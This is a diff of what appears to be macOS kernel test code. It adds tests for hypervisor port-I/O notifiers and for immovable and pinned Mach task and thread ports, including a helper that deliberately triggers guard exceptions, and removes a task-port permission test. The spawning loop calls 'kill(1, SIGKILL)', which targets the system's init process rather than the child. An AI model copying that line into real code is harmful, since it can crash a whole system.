HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xcd, ignoring if the queue fills"); + + /* One for writes to 0xef asking for exits when the queue is full. */ + hret = hv_vm_add_pio_notifier(0xef, 0, 0, notify_port[3], + HV_ION_ANY_SIZE | HV_ION_ANY_VALUE | HV_ION_EXIT_FULL); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "adding notifier for all writes " + "to port 0xef, not ignoring if the queue fills"); + + pthread_t vcpu_thread = create_vcpu_thread((vcpu_entry_function) + (((uintptr_t)pio_entry & PAGE_MASK) + 0x1000), 0, pio_monitor, + &handle_io_count); + T_ASSERT_POSIX_SUCCESS(pthread_join(vcpu_thread, NULL), "join vcpu"); + + /* Expect messages to be waiting. */ + T_ASSERT_EQ(4, get_count(notify_port[0]), "expected 4 messages"); + T_ASSERT_EQ(1, get_count(notify_port[1]), "expected 1 messages"); + T_ASSERT_EQ(10, get_count(notify_port[2]) + handle_io_count, "expected IO exits"); + T_ASSERT_EQ(5, get_count(notify_port[3]), "expected 5 messages"); + + hret = hv_vm_remove_pio_notifier(0xab, 0, 0, notify_port[0], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes to port 0xab"); + + hret = hv_vm_remove_pio_notifier(0xab, 4, 0xaa, notify_port[1], HV_ION_NONE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for 4 byte writes " + "to port 0xab"); + + hret = hv_vm_remove_pio_notifier(0xcd, 0, 0, notify_port[2], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes " + "to port 0xcd, ignoring if the queue fills"); + + hret = hv_vm_remove_pio_notifier(0xef, 0, 0, notify_port[3], HV_ION_ANY_SIZE | HV_ION_ANY_VALUE | HV_ION_EXIT_FULL); + T_QUIET; T_ASSERT_EQ(hret, HV_SUCCESS, "removing notifier for all writes " + "to port 0xef, not ignoring if the queue fills"); + + vm_cleanup(); + + for (int i = 0; i < MACH_PORT_COUNT; i++) { + mach_port_mod_refs(mach_task_self(), notify_port[i], MACH_PORT_RIGHT_RECEIVE, -1); + } +} diff --git a/tests/hvtest_x86_asm.s b/tests/hvtest_x86_asm.s index c2783f5c5..461b1dbc4 100644 --- a/tests/hvtest_x86_asm.s +++ b/tests/hvtest_x86_asm.s @@ -482,5 +482,42 @@ _radar60691363_entry: vmcall +.code16 + + // Perform a fixed number of port I/Os with various arguments. + .global _pio_entry +_pio_entry: + + movl $0xaa, %eax + + outl %eax, $0xab + + movl $3, %ecx +1: outb %al, $0xab + loop 1b + + movl $10, %ecx +1: outb %al, $0xcd + loop 1b + + movl $10, %ecx +1: outb %al, $0xef + loop 1b + + movl $0x23456, %eax + vmcall + +.code16 + // Perform 10 port I/Os on 0xef. + .global _pio_entry_basic +_pio_entry_basic: + + movl $10, %ecx +1: outb %al, $0xef + loop 1b + + movl $0x23456, %eax + vmcall + .global _hvtest_end _hvtest_end: diff --git a/tests/hvtest_x86_guest.h b/tests/hvtest_x86_guest.h index 5cb41f34c..df15339ce 100644 --- a/tests/hvtest_x86_guest.h +++ b/tests/hvtest_x86_guest.h @@ -13,6 +13,8 @@ extern void radar61961809_entry(uint64_t) OS_NORETURN; extern void radar61961809_prepare(uint64_t) OS_NORETURN; extern void radar61961809_loop64(uint64_t) OS_NORETURN; extern void radar60691363_entry(uint64_t) OS_NORETURN; +extern void pio_entry(uint64_t) OS_NORETURN; +extern void pio_entry_basic(uint64_t) OS_NORETURN; #define MSR_IA32_STAR 0xc0000081 #define MSR_IA32_LSTAR 0xc0000082 diff --git a/tests/imm_pinned_control_port.c b/tests/imm_pinned_control_port.c new file mode 100644 index 000000000..441cdba62 --- /dev/null +++ b/tests/imm_pinned_control_port.c @@ -0,0 +1,370 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MAX_ARGV 3 +#define EXC_CODE_SHIFT 32 +#define EXC_GUARD_TYPE_SHIFT 29 +#define MAX_TEST_NUM 13 + +#define TASK_EXC_GUARD_MP_DELIVER 0x10 + +extern char **environ; +static uint64_t exception_code = 0; +static exception_type_t exception_taken = 0; + +#define IKOT_TASK_CONTROL 2 + +/* + * This test verifies behaviors of immovable/pinned task/thread ports. + * + * 1. Compare and verifies port names of mach_{task, thread}_self(), + * {TASK, THREAD}_KERNEL_PORT, and ports returned from task_threads() + * and processor_set_tasks(). + * 2. Make sure correct exceptions are raised resulting from moving immovable + * task/thread control, read and inspect ports. + * 3. Make sure correct exceptions are raised resulting from deallocating pinned + * task/thread control ports. + * 4. Make sure immovable ports cannot be stashed: + * rdar://70585367 (Disallow immovable port stashing with *_set_special_port() and mach_port_register()) + */ +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(TRUE)); + +static uint64_t test_exception_code[] = { + /* Pinning tests. Currently delivered as soft crash */ + EXC_GUARD, // Soft crash delivered as EXC_CORPSE_NOTIFY + EXC_GUARD, + EXC_GUARD, + EXC_GUARD, + EXC_GUARD, + + /* Immovable tests. Currently delivered as hard crash */ + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, + (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE, +}; + +kern_return_t +catch_mach_exception_raise_state(mach_port_t exception_port, + exception_type_t exception, + const mach_exception_data_t code, + mach_msg_type_number_t code_count, + int * flavor, + const thread_state_t old_state, + mach_msg_type_number_t old_state_count, + thread_state_t new_state, + mach_msg_type_number_t * new_state_count) +{ +#pragma unused(exception_port, exception, code, code_count, flavor, old_state, old_state_count, new_state, new_state_count) + T_FAIL("Unsupported catch_mach_exception_raise_state"); + return KERN_NOT_SUPPORTED; +} + +kern_return_t +catch_mach_exception_raise_state_identity(mach_port_t exception_port, + mach_port_t thread, + mach_port_t task, + exception_type_t exception, + mach_exception_data_t code, + mach_msg_type_number_t code_count, + int * flavor, + thread_state_t old_state, + mach_msg_type_number_t old_state_count, + thread_state_t new_state, + mach_msg_type_number_t * new_state_count) +{ +#pragma unused(exception_port, thread, task, exception, code, code_count, flavor, old_state, old_state_count, new_state, new_state_count) + T_FAIL("Unsupported catch_mach_exception_raise_state_identity"); + return KERN_NOT_SUPPORTED; +} + +kern_return_t +catch_mach_exception_raise(mach_port_t exception_port, + mach_port_t thread, + mach_port_t task, + exception_type_t exception, + mach_exception_data_t code, + mach_msg_type_number_t code_count) +{ +#pragma unused(exception_port, code_count) + pid_t pid; + kern_return_t kr = pid_for_task(task, &pid); + T_EXPECT_MACH_SUCCESS(kr, "pid_for_task"); + T_LOG("Crashing child pid: %d, continuing...\n", pid); + + kr = mach_port_deallocate(mach_task_self(), thread); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); + kr = mach_port_deallocate(mach_task_self(), task); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); + + T_LOG("Caught exception type: %d code: 0x%llx", exception, *((uint64_t*)code)); + if (exception == EXC_GUARD || exception == EXC_CORPSE_NOTIFY) { + exception_taken = exception; + exception_code = *((uint64_t *)code); + } else { + T_FAIL("Unexpected exception"); + } + return KERN_SUCCESS; +} + +static void * +exception_server_thread(void *arg) +{ + kern_return_t kr; + mach_port_t exc_port = *(mach_port_t *)arg; + + /* Handle exceptions on exc_port */ + kr = mach_msg_server_once(mach_exc_server, 4096, exc_port, 0); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_msg_server_once"); + + return NULL; +} + +static mach_port_t +alloc_exception_port(void) +{ + kern_return_t kret; + mach_port_t exc_port = MACH_PORT_NULL; + mach_port_t task = mach_task_self(); + + kret = mach_port_allocate(task, MACH_PORT_RIGHT_RECEIVE, &exc_port); + T_QUIET; T_EXPECT_MACH_SUCCESS(kret, "mach_port_allocate exc_port"); + + kret = mach_port_insert_right(task, exc_port, exc_port, MACH_MSG_TYPE_MAKE_SEND); + T_QUIET; T_EXPECT_MACH_SUCCESS(kret, "mach_port_insert_right exc_port"); + + return exc_port; +} + +static void +test_immovable_port_stashing(void) +{ + kern_return_t kr; + mach_port_t port; + + kr = task_set_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, mach_task_self()); + T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow task_set_special_port() with immovable port"); + + kr = thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, mach_thread_self()); + T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow task_set_special_port() with immovable port"); + + mach_port_t stash[1] = {mach_task_self()}; + kr = mach_ports_register(mach_task_self(), stash, 1); + T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow mach_ports_register() with immovable port"); + + T_QUIET; T_ASSERT_MACH_SUCCESS(mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port), "mach_port_allocate"); + T_QUIET; T_ASSERT_MACH_SUCCESS(mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND), "mach_port_insert_right"); + + stash[0] = port; + kr = mach_ports_register(mach_task_self(), stash, 1); + T_EXPECT_MACH_SUCCESS(kr, "mach_ports_register() should succeed with movable port"); +} + +static void +test_task_thread_port_values(void) +{ + T_LOG("Compare various task/thread control port values\n"); + kern_return_t kr; + mach_port_t port, th_self; + thread_array_t threadList; + mach_msg_type_number_t threadCount = 0; + boolean_t found_self = false; + processor_set_name_array_t psets; + processor_set_t pset_priv; + task_array_t taskList; + mach_msg_type_number_t pcnt = 0, tcnt = 0; + mach_port_t host = mach_host_self(); + + /* Compare with task/thread_get_special_port() */ + kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - TASK_KERNEL_PORT"); + T_EXPECT_NE(port, mach_task_self(), "TASK_KERNEL_PORT should not match mach_task_self()"); + mach_port_deallocate(mach_task_self(), port); + + kr = task_for_pid(mach_task_self(), getpid(), &port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_for_pid()"); + T_EXPECT_EQ(port, mach_task_self(), "task_for_pid(self) should match mach_task_self()"); + mach_port_deallocate(mach_task_self(), port); + + th_self = mach_thread_self(); + kr = thread_get_special_port(th_self, THREAD_KERNEL_PORT, &port); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port() - THREAD_KERNEL_PORT"); + T_EXPECT_NE(port, th_self, "THREAD_KERNEL_PORT should not match mach_thread_self()"); + mach_port_deallocate(mach_task_self(), port); + + /* Make sure task_threads() return immovable thread ports */ + kr = task_threads(mach_task_self(), &threadList, &threadCount); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_threads()"); + T_QUIET; T_ASSERT_GE(threadCount, 1, "should have at least 1 thread"); + + for (size_t i = 0; i < threadCount; i++) { + if (th_self == threadList[i]) { /* th_self is immovable */ + found_self = true; + break; + } + } + + T_EXPECT_TRUE(found_self, "task_threads() should return immovable thread self"); + + for (size_t i = 0; i < threadCount; i++) { + mach_port_deallocate(mach_task_self(), threadList[i]); + } + + if (threadCount > 0) { + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)threadList, + threadCount * sizeof(mach_port_t)); + } + + mach_port_deallocate(mach_task_self(), th_self); + + /* Make sure processor_set_tasks() return immovable task self */ + kr = host_processor_sets(host, &psets, &pcnt); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_sets"); + T_QUIET; T_ASSERT_GE(pcnt, 1, "should have at least 1 processor set"); + + kr = host_processor_set_priv(host, psets[0], &pset_priv); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_set_priv"); + for (size_t i = 0; i < pcnt; i++) { + mach_port_deallocate(mach_task_self(), psets[i]); + } + mach_port_deallocate(mach_task_self(), host); + vm_deallocate(mach_task_self(), (vm_address_t)psets, (vm_size_t)pcnt * sizeof(mach_port_t)); + + kr = processor_set_tasks_with_flavor(pset_priv, TASK_FLAVOR_CONTROL, &taskList, &tcnt); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "processor_set_tasks_with_flavor"); + T_QUIET; T_ASSERT_GE(tcnt, 1, "should have at least 1 task"); + mach_port_deallocate(mach_task_self(), pset_priv); + + found_self = false; + for (size_t i = 0; i < tcnt; i++) { + if (taskList[i] == mach_task_self()) { + found_self = true; + break; + } + } + + T_EXPECT_TRUE(found_self, " processor_set_tasks() should return immovable task self"); + + for (size_t i = 0; i < tcnt; i++) { + mach_port_deallocate(mach_task_self(), taskList[i]); + } + + if (tcnt > 0) { + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)taskList, + tcnt * sizeof(mach_port_t)); + } +} + +T_DECL(imm_pinned_control_port, "Test pinned & immovable task and thread control ports", + T_META_IGNORECRASHES(".*pinned_rights_child.*"), + T_META_CHECK_LEAKS(false)) +{ + uint32_t task_exc_guard = 0; + size_t te_size = sizeof(&task_exc_guard); + posix_spawnattr_t attrs; + char *test_prog_name = "./imm_pinned_control_port_crasher"; + char *child_args[MAX_ARGV]; + pid_t client_pid = 0; + uint32_t opts = 0; + size_t size = sizeof(&opts); + mach_port_t exc_port; + pthread_t s_exc_thread; + uint64_t exc_id; + + T_LOG("Check if task_exc_guard exception has been enabled\n"); + int ret = sysctlbyname("kern.task_exc_guard_default", &task_exc_guard, &te_size, NULL, 0); + T_ASSERT_EQ(ret, 0, "sysctlbyname"); + + if (!(task_exc_guard & TASK_EXC_GUARD_MP_DELIVER)) { + T_SKIP("task_exc_guard exception is not enabled"); + } + + T_LOG("Check if immovable control port has been enabled\n"); + ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0); + + if (!ret && (opts & 0x30) == 0) { + T_SKIP("immovable control port isn't enabled"); + } + + /* first, try out comparing various task/thread ports */ + test_task_thread_port_values(); + + /* try stashing immovable ports: rdar://70585367 */ + test_immovable_port_stashing(); + + /* spawn a child and see if EXC_GUARD are correctly generated */ + for (int i = 0; i < MAX_TEST_NUM; i++) { + /* Create the exception port for the child */ + exc_port = alloc_exception_port(); + T_QUIET; T_ASSERT_NE(exc_port, MACH_PORT_NULL, "Create a new exception port"); + + /* Create exception serving thread */ + ret = pthread_create(&s_exc_thread, NULL, exception_server_thread, &exc_port); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create exception_server_thread"); + + /* Initialize posix_spawn attributes */ + posix_spawnattr_init(&attrs); + + int err = posix_spawnattr_setexceptionports_np(&attrs, EXC_MASK_GUARD | EXC_MASK_CORPSE_NOTIFY, exc_port, + (exception_behavior_t) (EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES), 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(err, "posix_spawnattr_setflags"); + + child_args[0] = test_prog_name; + char test_num[10]; + sprintf(test_num, "%d", i); + child_args[1] = test_num; + child_args[2] = NULL; + + T_LOG("========== Spawning new child =========="); + err = posix_spawn(&client_pid, child_args[0], NULL, &attrs, &child_args[0], environ); + T_ASSERT_POSIX_SUCCESS(err, "posix_spawn control_port_options_client = %d test_num = %d", client_pid, i); + + /* try extracting child task port: rdar://71744817 + * Moved to tests/extract_right_soft_fail.c + */ + // test_extract_immovable_task_port(client_pid); + + int child_status; + /* Wait for child and check for exception */ + if (-1 == waitpid(-1, &child_status, 0)) { + T_FAIL("waitpid: child mia"); + } + + if (WIFEXITED(child_status) && WEXITSTATUS(child_status)) { + T_FAIL("Child exited with status = %x", child_status); + T_END; + } + + sleep(1); + kill(1, SIGKILL); + + ret = pthread_join(s_exc_thread, NULL); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_join"); + + if (exception_taken == EXC_GUARD) { + exc_id = exception_code >> EXC_CODE_SHIFT; + } else { + exc_id = exception_code; + } + + T_LOG("Exception code: Received code = 0x%llx Expected code = 0x%llx", exc_id, test_exception_code[i]); + T_EXPECT_EQ(exc_id, test_exception_code[i], "Exception code: Received == Expected"); + } +} diff --git a/tests/imm_pinned_control_port_crasher.c b/tests/imm_pinned_control_port_crasher.c new file mode 100644 index 000000000..951ef9e93 --- /dev/null +++ b/tests/imm_pinned_control_port_crasher.c @@ -0,0 +1,262 @@ +#include +#include +#include +#include +#include +#include + +/* + * DO NOT run this test file by itself. + * This test is meant to be invoked by control_port_options darwintest. + * + * If hard enforcement for pinned control port is on, pinned_test_main_thread_mod_ref-5 are + * expected to generate fatal EXC_GUARD. + * + * If hard enforcement for immovable control port is on, immovable_test_move_send_task_self-13 are + * expected to generate fatal EXC_GUARD. + * + * The type of exception raised (if any) is checked on control_port_options side. + */ +#define MAX_TEST_NUM 13 + +static int +attempt_send_immovable_port(mach_port_name_t port, mach_msg_type_name_t disp) +{ + mach_port_t server; + kern_return_t kr; + kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &server); + assert(kr == 0); + + kr = mach_port_insert_right(mach_task_self(), server, server, MACH_MSG_TYPE_MAKE_SEND); + assert(kr == 0); + + struct { + mach_msg_header_t header; + mach_msg_body_t body; + mach_msg_port_descriptor_t desc; + } msg; + + msg.header.msgh_remote_port = server; + msg.header.msgh_local_port = MACH_PORT_NULL; + msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX; + msg.header.msgh_size = sizeof msg; + + msg.body.msgh_descriptor_count = 1; + + msg.desc.name = port; + msg.desc.disposition = disp; + msg.desc.type = MACH_MSG_PORT_DESCRIPTOR; + + return mach_msg_send(&msg.header); +} + +static void +pinned_test_main_thread_mod_ref() +{ + printf("[Crasher]: Mod refs main thread's self port to 0\n"); + mach_port_t thread_self = mach_thread_self(); + kern_return_t kr = mach_port_mod_refs(mach_task_self(), thread_self, MACH_PORT_RIGHT_SEND, -2); + + printf("[Crasher pinned_test_main_thread_mod_ref] mach_port_mod_refs returned %s \n.", mach_error_string(kr)); +} + +static void* +pthread_run() +{ + printf("[Crasher]: Deallocate pthread_self\n"); + mach_port_t th_self = pthread_mach_thread_np(pthread_self()); + kern_return_t kr = mach_port_deallocate(mach_task_self(), th_self); + + printf("[Crasher pinned_test_pthread_dealloc] mach_port_deallocate returned %s \n.", mach_error_string(kr)); + return NULL; +} + +static void +pinned_test_pthread_dealloc() +{ + printf("[Crasher]: Create a pthread and deallocate its self port\n"); + pthread_t thread; + int ret = pthread_create(&thread, NULL, pthread_run, NULL); + assert(ret == 0); + ret = pthread_join(thread, NULL); + assert(ret == 0); +} + +static void +pinned_test_task_self_dealloc() +{ + printf("[Crasher]: Deallocate mach_task_self twice\n"); + mach_port_t task_self = mach_task_self(); + kern_return_t kr = mach_port_deallocate(task_self, task_self); + assert(kr == 0); + kr = mach_port_deallocate(task_self, task_self); + + printf("[Crasher pinned_test_task_self_dealloc] mach_port_deallocate returned %s \n.", mach_error_string(kr)); +} + +static void +pinned_test_task_self_mod_ref() +{ + printf("[Crasher]: Mod refs mach_task_self() to 0\n"); + kern_return_t kr = mach_port_mod_refs(mach_task_self(), mach_task_self(), MACH_PORT_RIGHT_SEND, -2); + + printf("[Crasher pinned_test_task_self_mod_ref] mach_port_mod_refs returned %s \n.", mach_error_string(kr)); +} + +static void +pinned_test_task_threads_mod_ref() +{ + printf("[Crasher]: task_threads should return pinned thread ports. Mod refs them to 0\n"); + thread_array_t th_list; + mach_msg_type_number_t th_cnt; + kern_return_t kr; + mach_port_t th_kp = mach_thread_self(); + mach_port_deallocate(mach_task_self(), th_kp); + + kr = task_threads(mach_task_self(), &th_list, &th_cnt); + mach_port_deallocate(mach_task_self(), th_list[0]); + + kr = mach_port_mod_refs(mach_task_self(), th_list[0], MACH_PORT_RIGHT_SEND, -1); + + printf("[Crasher pinned_test_task_threads_mod_ref] mach_port_mod_refs returned %s \n.", mach_error_string(kr)); +} + +static void +immovable_test_move_send_task_self() +{ + kern_return_t kr; + printf("[Crasher]: Move send mach_task_self_\n"); + kr = attempt_send_immovable_port(mach_task_self(), MACH_MSG_TYPE_MOVE_SEND); + + printf("[Crasher immovable_test_move_send_task_self] attempt_send_immovable_port returned %s \n.", mach_error_string(kr)); +} + +static void +immovable_test_copy_send_task_self() +{ + kern_return_t kr; + printf("[Crasher]: Copy send mach_task_self_\n"); + kr = attempt_send_immovable_port(mach_task_self(), MACH_MSG_TYPE_COPY_SEND); + + printf("[Crasher immovable_test_copy_send_task_self] attempt_send_immovable_port returned %s \n.", mach_error_string(kr)); +} + +static void +immovable_test_move_send_thread_self() +{ + kern_return_t kr; + printf("[Crasher]: Move send main thread's self port\n"); + kr = attempt_send_immovable_port(mach_thread_self(), MACH_MSG_TYPE_MOVE_SEND); + + printf("[Crasher immovable_test_move_send_thread_self] attempt_send_immovable_port returned %s \n.", mach_error_string(kr)); +} + +static void +immovable_test_copy_send_thread_self() +{ + kern_return_t kr; + mach_port_t port; + printf("[Crasher]: Copy send main thread's self port\n"); + port = mach_thread_self(); + kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND); + printf("[Crasher immovable_test_copy_send_thread_self] attempt_send_immovable_port returned %s \n.", mach_error_string(kr)); + + mach_port_deallocate(mach_task_self(), port); +} + +static void +immovable_test_copy_send_task_read() +{ + kern_return_t kr; + mach_port_t port; + printf("[Crasher]: Copy send task read port\n"); + kr = task_get_special_port(mach_task_self(), TASK_READ_PORT, &port); + assert(kr == 0); + kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND); + printf("[Crasher immovable_test_copy_send_task_read] attempt_send_immovable_port returned %s \n.", mach_error_string(kr)); + + mach_port_deallocate(mach_task_self(), port); +} + +static void +immovable_test_copy_send_task_inspect() +{ + kern_return_t kr; + mach_port_t port; + printf("[Crasher]: Move send task inspect port\n"); + kr = task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &port); + assert(kr == 0); + kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_MOVE_SEND); + printf("[Crasher immovable_test_copy_send_task_inspect] attempt_send_immovable_port returned %s \n.", mach_error_string(kr)); +} + +static void +immovable_test_move_send_thread_inspect() +{ + kern_return_t kr; + mach_port_t port; + mach_port_t th_port = mach_thread_self(); + + printf("[Crasher]: Move send thread inspect port\n"); + kr = thread_get_special_port(th_port, THREAD_INSPECT_PORT, &port); + assert(kr == 0); + kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_MOVE_SEND); + printf("[Crasher immovable_test_move_send_thread_inspect] attempt_send_immovable_port returned %s \n.", mach_error_string(kr)); + + mach_port_deallocate(mach_task_self(), th_port); +} + +static void +immovable_test_copy_send_thread_read() +{ + kern_return_t kr; + mach_port_t port; + mach_port_t th_port = mach_thread_self(); + + printf("[Crasher]: Copy send thread read port\n"); + kr = thread_get_special_port(th_port, THREAD_READ_PORT, &port); + assert(kr == 0); + kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND); + printf("[Crasher immovable_test_copy_send_thread_read] attempt_send_immovable_port returned %s \n.", mach_error_string(kr)); + + mach_port_deallocate(mach_task_self(), port); + mach_port_deallocate(mach_task_self(), th_port); +} + +int +main(int argc, char *argv[]) +{ + void (*tests[MAX_TEST_NUM])(void) = { + pinned_test_main_thread_mod_ref, + pinned_test_pthread_dealloc, + pinned_test_task_self_dealloc, + pinned_test_task_self_mod_ref, + pinned_test_task_threads_mod_ref, + + immovable_test_move_send_task_self, + immovable_test_copy_send_task_self, + immovable_test_move_send_thread_self, + immovable_test_copy_send_thread_self, + immovable_test_copy_send_task_read, + immovable_test_copy_send_task_inspect, + immovable_test_move_send_thread_inspect, + immovable_test_copy_send_thread_read, + }; + printf("[Crasher]: My Pid: %d\n", getpid()); + + if (argc < 2) { + printf("[Crasher]: Specify a test to run."); + exit(-1); + } + + int test_num = atoi(argv[1]); + + if (test_num >= 0 && test_num < MAX_TEST_NUM) { + (*tests[test_num])(); + } else { + printf("[Crasher]: Invalid test num. Exiting...\n"); + exit(-1); + } + + exit(0); +} diff --git a/tests/inspect_port.c b/tests/inspect_port.c deleted file mode 100644 index b128b5b41..000000000 --- a/tests/inspect_port.c +++ /dev/null @@ -1,581 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int task_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); -int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); -int task_inspect_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); -int task_name_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); -static int test_conversion_eval(pid_t current, pid_t victim, int translation); - -static int g_tfpFail = 0; -static int g_trfpFail = 0; -static int g_tifpFail = 0; -static int g_tnfpFail = 0; - -static pthread_mutex_t g_lock; - -#define NAME 0 -#define INSPECT 1 -#define READ 2 -#define FULL 3 -#define POLY 4 - -/* - * 3. child still spawn as platform binary - */ - -/* Mimic the behavior of task_conversion_eval in kernel. - */ -static int -test_conversion_eval(pid_t current, pid_t victim, int translation) -{ - uint32_t my_csflags = 0; - uint32_t victim_csflags = 0; - csops(victim, CS_OPS_STATUS, &victim_csflags, sizeof(victim_csflags)); - csops(current, CS_OPS_STATUS, &my_csflags, sizeof(my_csflags)); - - switch (translation) { - case FULL: - case READ: - if (victim == 0) { - return false; - } - if (!(my_csflags & CS_PLATFORM_BINARY) && (victim_csflags & CS_PLATFORM_BINARY)) { - return false; - } - break; - default: - break; - } - - return true; -} - -static void -check_result(kern_return_t kr, int port_type, int translation, int low, char *test_str, pid_t victim) -{ - char error[100]; - - if (translation == POLY) { - if (port_type == FULL) { - translation = INSPECT; - } else { - translation = port_type; - } - } - - if (port_type < low) { - goto fail; - } else if (port_type < translation) { - goto fail; - } else if (!test_conversion_eval(getpid(), victim, translation)) { - goto fail; - } else { - goto success; - } - -fail: - snprintf(error, sizeof(error), "%s should fail with %d on %d.\n", test_str, port_type, victim); - T_QUIET; T_EXPECT_NE(kr, 0, "check_result: %s", error); - return; -success: - snprintf(error, sizeof(error), "%s should succeed with %d on %d.\n", test_str, port_type, victim); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "check_result: %s", error); - return; -} - -static void -test_thread_port(mach_port_name_t thread, int type, pid_t victim) -{ - kern_return_t kr; - mach_port_t name = MACH_PORT_NULL; - thread_info_data_t th_info; - mach_msg_type_number_t th_info_cnt = THREAD_INFO_MAX; - - kr = thread_info(thread, THREAD_BASIC_INFO, (thread_info_t)th_info, &th_info_cnt); - check_result(kr, type, INSPECT, INSPECT, "thread_info", victim); - - kr = thread_get_special_port(thread, THREAD_KERNEL_PORT, &name); - check_result(kr, type, POLY, FULL, "thread_get_special_port: THREAD_KERNEL_PORT", victim); - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - kr = thread_get_special_port(thread, THREAD_READ_PORT, &name); - check_result(kr, type, POLY, READ, "thread_get_special_port: THREAD_READ_PORT", victim); - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); - - kr = thread_get_special_port(thread, THREAD_INSPECT_PORT, &name); - check_result(kr, type, POLY, INSPECT, "thread_get_special_port: THREAD_INSPECT_PORT", victim); - kr = mach_port_deallocate(mach_task_self(), name); - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate"); -} - -static void -test_task_port(mach_port_name_t port, int type) -{ - kern_return_t kr; - volatile int data = 0x4141; - volatile int new_value = 0x4242; - pid_t victim; - if (port == MACH_PORT_NULL) { - return; - } - kr = pid_for_task(port, &victim); - if (victim == -1) { - T_LOG("pid_for_task: port = 0x%x, type = %u is not valid anymore", port, type); - return; - } - T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "pid_for_task, port = 0x%x, type = %u, pid = %u", port, type, victim); - - /************* TASK_INFO ************/ - struct task_basic_info info = {}; - mach_msg_type_number_t cnt = sizeof(info); - kr = task_info(port, TASK_BASIC_INFO, (task_info_t)&info, &cnt); - check_result(kr, type, NAME, NAME, "task_info", victim); - - /************ MACH_VM_* ************/ - - if (victim == getpid()) { - kr = mach_vm_write(port, - (mach_vm_address_t)&data, - (vm_offset_t)&new_value, - (mach_msg_type_number_t)sizeof(int)); - check_result(kr, type, FULL, FULL, "mach_vm_write", victim); - - vm_offset_t read_value = 0; - mach_msg_type_number_t read_cnt = 0; - kr = mach_vm_read(port, - (mach_vm_address_t)&data, - (mach_msg_type_number_t)sizeof(int), - &read_value, - &read_cnt); - check_result(kr, type, READ, READ, "mach_vm_read", victim); - } - - /************ TASK_GET_SPECIAL_PORT ************/ - - mach_port_t name = MACH_PORT_NULL; - kr = task_get_special_port(port, TASK_KERNEL_PORT, &name); - check_result(kr, type, POLY, FULL, 